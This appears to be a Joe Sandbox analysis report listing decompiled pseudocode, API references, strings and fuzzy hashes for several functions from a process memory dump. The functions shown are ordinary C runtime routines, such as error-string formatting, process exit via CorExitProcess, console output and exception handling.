API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: f8fa9e5c7d481a5506a2cc7451b99a91a67737e9b46ead218e65c66d131500f3
Instruction ID: 246224be88ec20a6c9f5f9a3c9e223cf3d6117d36aa497f83536d356c7b80555
Opcode Fuzzy Hash: f8fa9e5c7d481a5506a2cc7451b99a91a67737e9b46ead218e65c66d131500f3
Instruction Fuzzy Hash: B11172B2A44704A6E530BFB2CE87FCBB79C7F08704F401C1EB6D966192E76DB9444654

Uniqueness

Uniqueness Score: -1.00%

Function 00421DC0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00421DC0(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _t21;
				signed int _t55;

				_t21 =  *0x4c61a4; // 0x8656a166
				_v8 = _t21 ^ _t55;
				_t3 = _a8 + 4; // 0xffff2085
				_v108 = E00424450( &_v104,  *_t3);
				_t7 = _a8 + 8; // 0x2bb868ff
				_v112 = E00406240(__eflags,  &_v32, E00406320(__eflags,  &_v56, " at line ", E00424450( &_v80,  *_t7 + 1)), ", column ");
				E004061F0(_a4, _a4, _v112, _v108);
				E00416980( &_v32);
				E00416980( &_v56);
				E00416980( &_v80);
				E00416980( &_v104);
				return E00424900(_a4, __ebx, _v8 ^ _t55, _v108, __edi, __esi);
			}

0x00421dc6
0x00421dcd
0x00421dd3
0x00421de3
0x00421dee
0x00421e20
0x00421e2f
0x00421e3a
0x00421e42
0x00421e4a
0x00421e52
0x00421e67

APIs

task.LIBCPMTD ref: 00421E3A
task.LIBCPMTD ref: 00421E42
task.LIBCPMTD ref: 00421E4A
task.LIBCPMTD ref: 00421E52

Strings

, column , xrefs: 00421DE6
at line , xrefs: 00421E02

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task
String ID: at line $, column
API String ID: 1384045349-191570568
Opcode ID: a087a6b3ae568669179f93c9eab283666460867aca2b623b0a35b9d2f6d46207
Instruction ID: 1e95296fd64968575fe60fbdb4a1394af8375a16a1d77bc394110fc4bfd2e19e
Opcode Fuzzy Hash: a087a6b3ae568669179f93c9eab283666460867aca2b623b0a35b9d2f6d46207
Instruction Fuzzy Hash: B61149B5D1020CABCB04FFA5EC52DEDB778DF54304B51812EF9195B242EA34AA14CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00429659 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 30
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E00429659(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t14;

				_v8 = _v8 & 0x00000000;
				_t8 =  &_v8;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx);
				if(_t8 != 0) {
					_t8 = GetProcAddress(_v8, "CorExitProcess");
					_t14 = _t8;
					if(_t14 != 0) {
						 *0x440158(_a4);
						_t8 =  *_t14();
					}
				}
				if(_v8 != 0) {
					return FreeLibrary(_v8);
				}
				return _t8;
			}

0x0042965f
0x00429663
0x0042966e
0x00429676
0x00429681
0x00429687
0x0042968b
0x00429692
0x00429698
0x00429698
0x0042969a
0x0042969f
0x00000000
0x004296a4
0x004296ab

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0042960B,00000002,?,004295D3,00000003,0042976E,00000002), ref: 0042966E
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00429681
FreeLibrary.KERNEL32(00000000,?,?,0042960B,00000002,?,004295D3,00000003,0042976E,00000002), ref: 004296A4

Strings

4RB, xrefs: 00429692
CorExitProcess, xrefs: 00429679
mscoree.dll, xrefs: 00429667

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: 4RB$CorExitProcess$mscoree.dll
API String ID: 4061214504-109460035
Opcode ID: 3ae5f820817abc1e958b69717537621613eb17a144062aab70d072bc39988437
Instruction ID: cc93c635c478c8aab607db1872d93f904dca85cb1e35b675e280550e4c183275
Opcode Fuzzy Hash: 3ae5f820817abc1e958b69717537621613eb17a144062aab70d072bc39988437
Instruction Fuzzy Hash: B9F08234600218FBDB119B90ED09B9EBBF5EB01B52F100065B905A1160CB758E10DB9C

Uniqueness

Uniqueness Score: -1.00%

Function 004385E7 Relevance: 9.3, APIs: 6, Instructions: 317
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 84%

			E004385E7(void* __eflags, intOrPtr _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				char _v23;
				char _v24;
				void _v32;
				signed int _v33;
				signed char _v40;
				signed int _v44;
				intOrPtr _v48;
				char _v51;
				void _v52;
				long _v56;
				char _v60;
				intOrPtr _v68;
				char _v72;
				struct _OVERLAPPED* _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				char _v92;
				intOrPtr _v96;
				long _v100;
				signed char* _v104;
				signed char* _v108;
				void* _v112;
				intOrPtr _v116;
				char _v120;
				int _v124;
				intOrPtr _v128;
				struct _OVERLAPPED* _v132;
				struct _OVERLAPPED* _v136;
				struct _OVERLAPPED* _v140;
				struct _OVERLAPPED* _v144;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t170;
				signed int _t172;
				int _t178;
				intOrPtr _t183;
				intOrPtr _t186;
				void* _t188;
				void* _t190;
				long _t193;
				void _t198;
				signed char* _t202;
				void* _t206;
				struct _OVERLAPPED* _t211;
				void* _t220;
				long _t224;
				intOrPtr _t225;
				char _t227;
				void* _t237;
				signed int _t242;
				intOrPtr _t245;
				signed int _t248;
				signed int _t249;
				signed int _t251;
				intOrPtr _t253;
				void* _t259;
				intOrPtr _t260;
				signed int _t261;
				signed char _t264;
				intOrPtr _t267;
				signed char* _t269;
				signed int _t272;
				signed int _t273;
				signed int _t277;
				signed int _t278;
				intOrPtr _t279;
				signed int _t280;
				struct _OVERLAPPED* _t282;
				struct _OVERLAPPED* _t284;
				signed int _t285;
				void* _t286;
				void* _t287;

				_t170 =  *0x4c61a4; // 0x8656a166
				_v8 = _t170 ^ _t285;
				_t172 = _a8;
				_t264 = _t172 >> 6;
				_t242 = (_t172 & 0x0000003f) * 0x38;
				_t269 = _a12;
				_v108 = _t269;
				_v80 = _t264;
				_v112 =  *((intOrPtr*)(_t242 +  *((intOrPtr*)(0x4c7560 + _t264 * 4)) + 0x18));
				_v44 = _t242;
				_v96 = _a16 + _t269;
				_t178 = GetConsoleOutputCP();
				_t241 = 0;
				_v124 = _t178;
				E0042A0B3( &_v72, _t264, 0);
				_t273 = 0;
				_v92 = 0;
				_v88 = 0;
				_v84 = 0;
				_t245 =  *((intOrPtr*)(_v68 + 8));
				_v128 = _t245;
				_v104 = _t269;
				if(_t269 >= _v96) {
					L48:
					__eflags = _v60 - _t241;
				} else {
					while(1) {
						_t248 = _v44;
						_v51 =  *_t269;
						_v76 = _t241;
						_v40 = 1;
						_t186 =  *((intOrPtr*)(0x4c7560 + _v80 * 4));
						_v48 = _t186;
						if(_t245 != 0xfde9) {
							goto L19;
						}
						_t211 = _t241;
						_t267 = _v48 + 0x2e + _t248;
						_v116 = _t267;
						while( *((intOrPtr*)(_t267 + _t211)) != _t241) {
							_t211 =  &(_t211->Internal);
							if(_t211 < 5) {
								continue;
							}
							break;
						}
						_t264 = _v96 - _t269;
						_v40 = _t211;
						if(_t211 <= 0) {
							_t72 = ( *_t269 & 0x000000ff) + 0x4c6948; // 0x0
							_t253 =  *_t72 + 1;
							_v48 = _t253;
							__eflags = _t253 - _t264;
							if(_t253 > _t264) {
								__eflags = _t264;
								if(_t264 <= 0) {
									goto L40;
								} else {
									_t278 = _v44;
									do {
										 *((char*)( *((intOrPtr*)(0x4c7560 + _v80 * 4)) + _t278 + _t241 + 0x2e)) =  *((intOrPtr*)(_t241 + _t269));
										_t241 =  &(_t241->Internal);
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									goto L39;
								}
							} else {
								_v144 = _t241;
								__eflags = _t253 - 4;
								_v140 = _t241;
								_v56 = _t269;
								_v40 = (_t253 == 4) + 1;
								_t220 = E00439BDE( &_v144,  &_v76,  &_v56, (_t253 == 4) + 1,  &_v144);
								_t287 = _t286 + 0x10;
								__eflags = _t220 - 0xffffffff;
								if(_t220 == 0xffffffff) {
									goto L48;
								} else {
									_t279 = _v48;
									goto L18;
								}
							}
						} else {
							_t224 =  *((char*)(( *(_t248 + _v48 + 0x2e) & 0x000000ff) + 0x4c6948)) + 1;
							_v56 = _t224;
							_t225 = _t224 - _v40;
							_v48 = _t225;
							if(_t225 > _t264) {
								__eflags = _t264;
								if(_t264 > 0) {
									_t280 = _t248;
									do {
										_t227 =  *((intOrPtr*)(_t241 + _t269));
										_t259 =  *((intOrPtr*)(0x4c7560 + _v80 * 4)) + _t280 + _t241;
										_t241 =  &(_t241->Internal);
										 *((char*)(_t259 + _v40 + 0x2e)) = _t227;
										_t280 = _v44;
										__eflags = _t241 - _t264;
									} while (_t241 < _t264);
									L39:
									_t273 = _v88;
								}
								L40:
								_t277 = _t273 + _t264;
								__eflags = _t277;
								L41:
								__eflags = _v60;
								_v88 = _t277;
							} else {
								_t264 = _v40;
								_t282 = _t241;
								_t260 = _v116;
								do {
									 *((char*)(_t285 + _t282 - 0xc)) =  *((intOrPtr*)(_t260 + _t282));
									_t282 =  &(_t282->Internal);
								} while (_t282 < _t264);
								_t283 = _v48;
								_t261 = _v44;
								if(_v48 > 0) {
									E00426DB0( &_v16 + _t264, _t269, _t283);
									_t261 = _v44;
									_t286 = _t286 + 0xc;
									_t264 = _v40;
								}
								_t272 = _v80;
								_t284 = _t241;
								do {
									 *( *((intOrPtr*)(0x4c7560 + _t272 * 4)) + _t261 + _t284 + 0x2e) = _t241;
									_t284 =  &(_t284->Internal);
								} while (_t284 < _t264);
								_t269 = _v104;
								_t279 = _v48;
								_v120 =  &_v16;
								_v136 = _t241;
								_v132 = _t241;
								_v40 = (_v56 == 4) + 1;
								_t237 = E00439BDE( &_v136,  &_v76,  &_v120, (_v56 == 4) + 1,  &_v136);
								_t287 = _t286 + 0x10;
								if(_t237 == 0xffffffff) {
									goto L48;
								} else {
									L18:
									_t269 = _t269 - 1 + _t279;
									L27:
									_t269 =  &(_t269[1]);
									_v104 = _t269;
									_t193 = E00437047(_v124, _t241,  &_v76, _v40,  &_v32, 5, _t241, _t241);
									_t286 = _t287 + 0x20;
									_v56 = _t193;
									if(_t193 == 0) {
										goto L48;
									} else {
										if(WriteFile(_v112,  &_v32, _t193,  &_v100, _t241) == 0) {
											L47:
											_v92 = GetLastError();
											goto L48;
										} else {
											_t273 = _v84 - _v108 + _t269;
											_v88 = _t273;
											if(_v100 < _v56) {
												goto L48;
											} else {
												if(_v51 != 0xa) {
													L34:
													if(_t269 >= _v96) {
														goto L48;
													} else {
														_t245 = _v128;
														continue;
													}
												} else {
													_t198 = 0xd;
													_v52 = _t198;
													if(WriteFile(_v112,  &_v52, 1,  &_v100, _t241) == 0) {
														goto L47;
													} else {
														if(_v100 < 1) {
															goto L48;
														} else {
															_v84 = _v84 + 1;
															_t273 = _t273 + 1;
															_v88 = _t273;
															goto L34;
														}
													}
												}
											}
										}
									}
								}
							}
						}
						goto L49;
						L19:
						_t264 =  *((intOrPtr*)(_t248 + _t186 + 0x2d));
						__eflags = _t264 & 0x00000004;
						if((_t264 & 0x00000004) == 0) {
							_v33 =  *_t269;
							_t188 = E00432A17(_t264);
							_t249 = _v33 & 0x000000ff;
							__eflags =  *((intOrPtr*)(_t188 + _t249 * 2)) - _t241;
							if( *((intOrPtr*)(_t188 + _t249 * 2)) >= _t241) {
								_push(1);
								_push(_t269);
								goto L26;
							} else {
								_t100 =  &(_t269[1]); // 0x1
								_t202 = _t100;
								_v56 = _t202;
								__eflags = _t202 - _v96;
								if(_t202 >= _v96) {
									_t264 = _v80;
									_t251 = _v44;
									_t241 = _v33;
									 *((char*)(_t251 +  *((intOrPtr*)(0x4c7560 + _t264 * 4)) + 0x2e)) = _v33;
									 *(_t251 +  *((intOrPtr*)(0x4c7560 + _t264 * 4)) + 0x2d) =  *(_t251 +  *((intOrPtr*)(0x4c7560 + _t264 * 4)) + 0x2d) | 0x00000004;
									_t277 = _t273 + 1;
									goto L41;
								} else {
									_t206 = E0043401E( &_v76, _t269, 2);
									_t287 = _t286 + 0xc;
									__eflags = _t206 - 0xffffffff;
									if(_t206 == 0xffffffff) {
										goto L48;
									} else {
										_t269 = _v56;
										goto L27;
									}
								}
							}
						} else {
							_t264 = _t264 & 0x000000fb;
							_v24 =  *((intOrPtr*)(_t248 + _t186 + 0x2e));
							_v23 =  *_t269;
							_push(2);
							 *(_t248 + _v48 + 0x2d) = _t264;
							_push( &_v24);
							L26:
							_push( &_v76);
							_t190 = E0043401E();
							_t287 = _t286 + 0xc;
							__eflags = _t190 - 0xffffffff;
							if(_t190 == 0xffffffff) {
								goto L48;
							} else {
								goto L27;
							}
						}
						goto L49;
					}
				}
				L49:
				if(__eflags != 0) {
					_t183 = _v72;
					_t165 = _t183 + 0x350;
					 *_t165 =  *(_t183 + 0x350) & 0xfffffffd;
					__eflags =  *_t165;
				}
				__eflags = _v8 ^ _t285;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				return E00424900(_a4, _t241, _v8 ^ _t285, _t264, _a4,  &_v92);
			}

0x004385f2
0x004385f9
0x004385fc
0x00438604
0x00438607
0x00438614
0x00438617
0x0043861a
0x00438621
0x00438629
0x0043862c
0x0043862f
0x00438635
0x00438637
0x0043863e
0x00438648
0x0043864a
0x0043864d
0x00438650
0x00438653
0x00438656
0x00438659
0x0043865f
0x0043896a
0x0043896a
0x00000000
0x00438665
0x0043866d
0x00438670
0x00438676
0x00438679
0x00438680
0x00438687
0x0043868a
0x00000000
0x00000000
0x00438693
0x00438698
0x0043869a
0x0043869d
0x004386a2
0x004386a6
0x00000000
0x00000000
0x00000000
0x004386a6
0x004386ab
0x004386ad
0x004386b2
0x0043876c
0x00438773
0x00438774
0x00438777
0x00438779
0x0043891d
0x0043891f
0x00000000
0x00438921
0x00438921
0x00438924
0x00438933
0x00438937
0x00438938
0x00438938
0x00000000
0x0043893c
0x0043877f
0x00438781
0x00438787
0x0043878a
0x00438796
0x0043879f
0x004387aa
0x004387af
0x004387b2
0x004387b5
0x00000000
0x004387bb
0x004387bb
0x00000000
0x004387bb
0x004387b5
0x004386b8
0x004386c7
0x004386c8
0x004386cb
0x004386ce
0x004386d3
0x004388e9
0x004388eb
0x004388ed
0x004388ef
0x004388f9
0x00438901
0x00438903
0x00438904
0x00438908
0x0043890b
0x0043890b
0x0043890f
0x0043890f
0x0043890f
0x00438912
0x00438912
0x00438912
0x00438914
0x00438914
0x00438918
0x004386d9
0x004386d9
0x004386dc
0x004386de
0x004386e1
0x004386e4
0x004386e8
0x004386e9
0x004386ed
0x004386f0
0x004386f5
0x004386ff
0x00438704
0x00438707
0x0043870a
0x0043870a
0x0043870d
0x00438710
0x00438712
0x0043871b
0x0043871f
0x00438720
0x00438724
0x0043872a
0x00438733
0x00438740
0x00438747
0x0043874b
0x00438756
0x0043875b
0x00438761
0x00000000
0x00438767
0x004387be
0x004387bf
0x00438842
0x00438849
0x00438851
0x00438859
0x0043885e
0x00438861
0x00438866
0x00000000
0x0043886c
0x00438881
0x00438961
0x00438967
0x00000000
0x00438887
0x00438890
0x00438892
0x00438898
0x00000000
0x0043889e
0x004388a2
0x004388d8
0x004388db
0x00000000
0x004388e1
0x004388e1
0x00000000
0x004388e1
0x004388a4
0x004388a6
0x004388a8
0x004388c1
0x00000000
0x004388c7
0x004388cb
0x00000000
0x004388d1
0x004388d1
0x004388d4
0x004388d5
0x00000000
0x004388d5
0x004388cb
0x004388c1
0x004388a2
0x00438898
0x00438881
0x00438866
0x00438761
0x004386d3
0x00000000
0x004387c3
0x004387c3
0x004387c7
0x004387ca
0x004387ec
0x004387ef
0x004387f4
0x004387f8
0x004387fc
0x0043882a
0x0043882c
0x00000000
0x004387fe
0x004387fe
0x004387fe
0x00438801
0x00438804
0x00438807
0x0043893e
0x00438941
0x00438944
0x0043894e
0x00438959
0x0043895e
0x00000000
0x0043880d
0x00438814
0x00438819
0x0043881c
0x0043881f
0x00000000
0x00438825
0x00438825
0x00000000
0x00438825
0x0043881f
0x00438807
0x004387cc
0x004387d0
0x004387d3
0x004387d8
0x004387de
0x004387e0
0x004387e7
0x0043882d
0x00438830
0x00438831
0x00438836
0x00438839
0x0043883c
0x00000000
0x00000000
0x00000000
0x00000000
0x0043883c
0x00000000
0x004387ca
0x00438665
0x0043896d
0x0043896d
0x0043896f
0x00438972
0x00438972
0x00438972
0x00438972
0x00438984
0x00438986
0x00438987
0x00438988
0x00438992

APIs

GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 0043862F
__fassign.LIBCMT ref: 00438814
__fassign.LIBCMT ref: 00438831
WriteFile.KERNEL32(?,0043B4D3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00438879
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004388B9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00438961

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 53f029d22fe4923308598a5916adf6b7d8fc998d07c66b19fd4081eb2ebc6da0
Instruction ID: 217fecbabddac56207d7511c2cebe61169f07e32fb3b2530a3db8dad6326be15
Opcode Fuzzy Hash: 53f029d22fe4923308598a5916adf6b7d8fc998d07c66b19fd4081eb2ebc6da0
Instruction Fuzzy Hash: 62C18DB5D042589FDB14CFA8C880AEDFBB5BF08314F28516EE855BB341D635A902CF64

Uniqueness

Uniqueness Score: -1.00%

Function 00427DD3 Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00427DD3(void* __ecx) {
				void* _t4;
				void* _t8;
				void* _t11;
				void* _t13;
				void* _t14;
				void* _t18;
				void* _t23;
				long _t24;
				void* _t27;

				_t13 = __ecx;
				if( *0x4c61d0 != 0xffffffff) {
					_t24 = GetLastError();
					_t11 = E00428F9D(_t13, __eflags,  *0x4c61d0);
					_t14 = _t23;
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00428FD8(_t14, __eflags,  *0x4c61d0, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E00431F04();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00428FD8(_t18, __eflags,  *0x4c61d0, 0);
								} else {
									_t8 = E00428FD8(_t18, __eflags,  *0x4c61d0, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E0043195F(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}

0x00427dd3
0x00427dda
0x00427ded
0x00427df4
0x00427df6
0x00427df7
0x00427dfa
0x00427e13
0x00427e13
0x00427dfc
0x00427dfc
0x00427dfe
0x00427e08
0x00427e0f
0x00427e11
0x00427e18
0x00427e21
0x00427e24
0x00427e25
0x00427e27
0x00427e3b
0x00427e3b
0x00427e44
0x00427e29
0x00427e30
0x00427e36
0x00427e37
0x00427e39
0x00427e4d
0x00427e4f
0x00427e4f
0x00000000
0x00000000
0x00000000
0x00427e39
0x00427e52
0x00000000
0x00000000
0x00000000
0x00427e11
0x00427dfe
0x00427e5a
0x00427e64
0x00427ddc
0x00427dde
0x00427dde

APIs

GetLastError.KERNEL32(?,?,00427DCA,00427D9C,00425455), ref: 00427DE1
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00427DEF
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00427E08
SetLastError.KERNEL32(00000000,00427DCA,00427D9C,00425455), ref: 00427E5A

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 5675f8915273337bc61f50bc94bdebbe8a2ccd78f1b0f60ff62da5910d21a395
Instruction ID: 6f832119d7a13784c67b21f53adc62e10ee8164f079152e53efc754db8c210ab
Opcode Fuzzy Hash: 5675f8915273337bc61f50bc94bdebbe8a2ccd78f1b0f60ff62da5910d21a395
Instruction Fuzzy Hash: BD01D83230D7325EDB652B757C85A6B2745EB11BBABA2023FF610851E1EF294C11515C

Uniqueness

Uniqueness Score: -1.00%

Function 00427EB3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 168
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E00427EB3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t52;
				signed int _t53;
				intOrPtr _t54;
				signed int _t58;
				signed int _t61;
				intOrPtr _t71;
				signed int _t75;
				signed int _t79;
				signed int _t81;
				signed int _t84;
				signed int _t85;
				signed int _t97;
				signed int* _t98;
				signed char* _t101;
				signed int _t107;
				void* _t111;

				_push(0x10);
				_push(0x44a238);
				E004254D0(__ebx, __edi, __esi);
				_t75 = 0;
				_t52 =  *(_t111 + 0x10);
				_t81 = _t52[1];
				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
					L30:
					_t53 = 0;
					__eflags = 0;
					goto L31;
				} else {
					_t97 = _t52[2];
					if(_t97 != 0 ||  *_t52 < 0) {
						_t84 =  *_t52;
						_t107 =  *(_t111 + 0xc);
						if(_t84 >= 0) {
							_t107 = _t107 + 0xc + _t97;
						}
						 *(_t111 - 4) = _t75;
						_t101 =  *(_t111 + 0x14);
						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
							L10:
							_t54 =  *((intOrPtr*)(_t111 + 8));
							__eflags = _t84 & 0x00000008;
							if((_t84 & 0x00000008) == 0) {
								__eflags =  *_t101 & 0x00000001;
								if(( *_t101 & 0x00000001) == 0) {
									_t84 =  *(_t54 + 0x18);
									__eflags = _t101[0x18] - _t75;
									if(_t101[0x18] != _t75) {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												__eflags =  *_t101 & 0x00000004;
												_t79 = 0;
												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
												__eflags = _t75;
												 *(_t111 - 0x20) = _t75;
												goto L29;
											}
										}
									} else {
										__eflags = _t84;
										if(_t84 == 0) {
											goto L32;
										} else {
											__eflags = _t107;
											if(_t107 == 0) {
												goto L32;
											} else {
												E00426DB0(_t107, E00427D1C(_t84,  &(_t101[8])), _t101[0x14]);
												goto L29;
											}
										}
									}
								} else {
									__eflags =  *(_t54 + 0x18);
									if( *(_t54 + 0x18) == 0) {
										goto L32;
									} else {
										__eflags = _t107;
										if(_t107 == 0) {
											goto L32;
										} else {
											E00426DB0(_t107,  *(_t54 + 0x18), _t101[0x14]);
											__eflags = _t101[0x14] - 4;
											if(_t101[0x14] == 4) {
												__eflags =  *_t107;
												if( *_t107 != 0) {
													_push( &(_t101[8]));
													_push( *_t107);
													goto L21;
												}
											}
											goto L29;
										}
									}
								}
							} else {
								_t84 =  *(_t54 + 0x18);
								goto L12;
							}
						} else {
							_t71 =  *0x4c70ec; // 0x0
							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
							if(_t71 == 0) {
								goto L10;
							} else {
								 *0x440158();
								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
								L12:
								if(_t84 == 0 || _t107 == 0) {
									L32:
									E0042972B(_t75, _t84, _t97, _t101, _t107);
									asm("int3");
									_push(8);
									_push(0x44a258);
									E004254D0(_t75, _t101, _t107);
									_t98 =  *(_t111 + 0x10);
									_t85 =  *(_t111 + 0xc);
									__eflags =  *_t98;
									if(__eflags >= 0) {
										_t103 = _t85 + 0xc + _t98[2];
										__eflags = _t85 + 0xc + _t98[2];
									} else {
										_t103 = _t85;
									}
									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
									_t108 =  *(_t111 + 0x14);
									_push( *(_t111 + 0x14));
									_push(_t98);
									_push(_t85);
									_t77 =  *((intOrPtr*)(_t111 + 8));
									_push( *((intOrPtr*)(_t111 + 8)));
									_t58 = E00427EB3(_t77, _t103, _t108, __eflags) - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										_t61 = E00428BB9(_t103, _t108[0x18], E00427D1C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
									} else {
										_t61 = _t58 - 1;
										__eflags = _t61;
										if(_t61 == 0) {
											_t61 = E00428BC9(_t103, _t108[0x18], E00427D1C( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
										}
									}
									 *(_t111 - 4) = 0xfffffffe;
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t61;
								} else {
									 *_t107 = _t84;
									_push( &(_t101[8]));
									_push(_t84);
									L21:
									 *_t107 = E00427D1C();
									L29:
									 *(_t111 - 4) = 0xfffffffe;
									_t53 = _t75;
									L31:
									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
									return _t53;
								}
							}
						}
					} else {
						goto L30;
					}
				}
			}

0x00427eb3
0x00427eb5
0x00427eba
0x00427ebf
0x00427ec1
0x00427ec4
0x00427ec9
0x00427fd9
0x00427fd9
0x00427fd9
0x00000000
0x00427ed8
0x00427ed8
0x00427edd
0x00427ee7
0x00427ee9
0x00427eee
0x00427ef3
0x00427ef3
0x00427ef5
0x00427ef8
0x00427efd
0x00427f1f
0x00427f1f
0x00427f22
0x00427f25
0x00427f43
0x00427f46
0x00427f85
0x00427f88
0x00427f8b
0x00427fb0
0x00427fb2
0x00000000
0x00427fb4
0x00427fb4
0x00427fb6
0x00000000
0x00427fb8
0x00427fb8
0x00427fbd
0x00427fc1
0x00427fc1
0x00427fc2
0x00000000
0x00427fc2
0x00427fb6
0x00427f8d
0x00427f8d
0x00427f8f
0x00000000
0x00427f91
0x00427f91
0x00427f93
0x00000000
0x00427f95
0x00427fa6
0x00000000
0x00427fab
0x00427f93
0x00427f8f
0x00427f48
0x00427f48
0x00427f4c
0x00000000
0x00427f52
0x00427f52
0x00427f54
0x00000000
0x00427f5a
0x00427f61
0x00427f69
0x00427f6d
0x00427f6f
0x00427f72
0x00427f77
0x00427f78
0x00000000
0x00427f78
0x00427f72
0x00000000
0x00427f6d
0x00427f54
0x00427f4c
0x00427f27
0x00427f27
0x00000000
0x00427f27
0x00427f04
0x00427f04
0x00427f09
0x00427f0e
0x00000000
0x00427f10
0x00427f12
0x00427f1b
0x00427f2a
0x00427f2c
0x00427feb
0x00427feb
0x00427ff0
0x00427ff1
0x00427ff3
0x00427ff8
0x00427ffd
0x00428000
0x00428003
0x00428006
0x0042800f
0x0042800f
0x00428008
0x00428008
0x00428008
0x00428012
0x00428016
0x00428019
